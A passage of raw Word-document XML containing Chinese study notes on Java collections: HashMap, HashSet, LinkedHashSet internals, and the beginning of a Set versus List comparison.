          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HashMap </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>：实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>接口；使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>算法，里面的数据是无序的；并且存储的是键值对；非线程安全；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE66F6" w:rsidRPr="00F41A4C" w:rsidRDefault="00DE66F6" w:rsidP="00DE66F6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HashSet </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>：实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>接口；内部封装了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hashmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，故也是无序的；因为实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>接口，存储的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>永远为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PRESENT</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>；非线程安全；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE66F6" w:rsidRPr="00F41A4C" w:rsidRDefault="00DE66F6" w:rsidP="00556929">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E47270" w:rsidRPr="00F41A4C" w:rsidRDefault="00E47270" w:rsidP="00556929">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006E3376" w:rsidRPr="00F41A4C" w:rsidRDefault="006E3376" w:rsidP="00556929">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://zhangshixi.iteye.com/blog/673143</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E066BF" w:rsidRPr="00F41A4C" w:rsidRDefault="00E066BF" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA072C" w:rsidRPr="00F41A4C" w:rsidRDefault="002B7305" w:rsidP="00BA072C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00BA072C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  LinkedHashSet</w:t>
      </w:r>
      <w:r w:rsidR="00BA072C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00047079" w:rsidRPr="00F41A4C" w:rsidRDefault="00047079" w:rsidP="00047079">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>1. LinkedHashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>概述：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00047079" w:rsidRPr="00F41A4C" w:rsidRDefault="00047079" w:rsidP="00047079">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>LinkedHashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>是具有可预知迭代顺序的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>接口的哈希表和链接列表实现。此实现与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的不同之处在于，后者维护着一个运行于所有条目的双重链接列表。此链接列表定义了迭代顺序，该迭代顺序可为插入顺序或是访问顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00047079" w:rsidRPr="00F41A4C" w:rsidRDefault="00047079" w:rsidP="00047079">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>注意，此实现不是同步的。如果多个线程同时访问链接的哈希</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，而其中至少一个线程修改了该</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，则它必须保持外部同步。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00047079" w:rsidRPr="00F41A4C" w:rsidRDefault="00047079" w:rsidP="00047079">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>2. LinkedHashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>的实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00047079" w:rsidRPr="00F41A4C" w:rsidRDefault="00047079" w:rsidP="00047079">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>LinkedHashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>而言，它继承与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、又基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>来实现的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00047079" w:rsidRPr="00F41A4C" w:rsidRDefault="00047079" w:rsidP="00047079">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>LinkedHashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>底层使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>来保存所有元素，它继承与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，其所有的方法操作上又与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>相同，因此</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">LinkedHashSet </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的实现上非常简单，只提供了四个构造方法，并通过传递一个标识参数，调用父类的构造器，底层构造一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>LinkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>来实现，在相关操作上与父类</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的操作相同，直接调用父类</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的方法即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA072C" w:rsidRPr="00F41A4C" w:rsidRDefault="00BA072C" w:rsidP="00BA072C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C536F8" w:rsidRPr="00F41A4C" w:rsidRDefault="00C536F8" w:rsidP="00BA072C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C536F8" w:rsidRPr="00F41A4C" w:rsidRDefault="00C536F8" w:rsidP="00BA072C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://zhangshixi.iteye.com/blog/673319</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015575A" w:rsidRPr="00F41A4C" w:rsidRDefault="0015575A" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D2D96" w:rsidRPr="00F41A4C" w:rsidRDefault="005D2D96" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C35EC3" w:rsidRPr="00F41A4C" w:rsidRDefault="00C229A2" w:rsidP="00C35EC3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00C35EC3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  Set</w:t>
      </w:r>
      <w:r w:rsidR="00C35EC3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00C35EC3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidR="00C35EC3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C00672" w:rsidRPr="00F41A4C" w:rsidRDefault="00C00672" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>都继承</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00903CE4" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
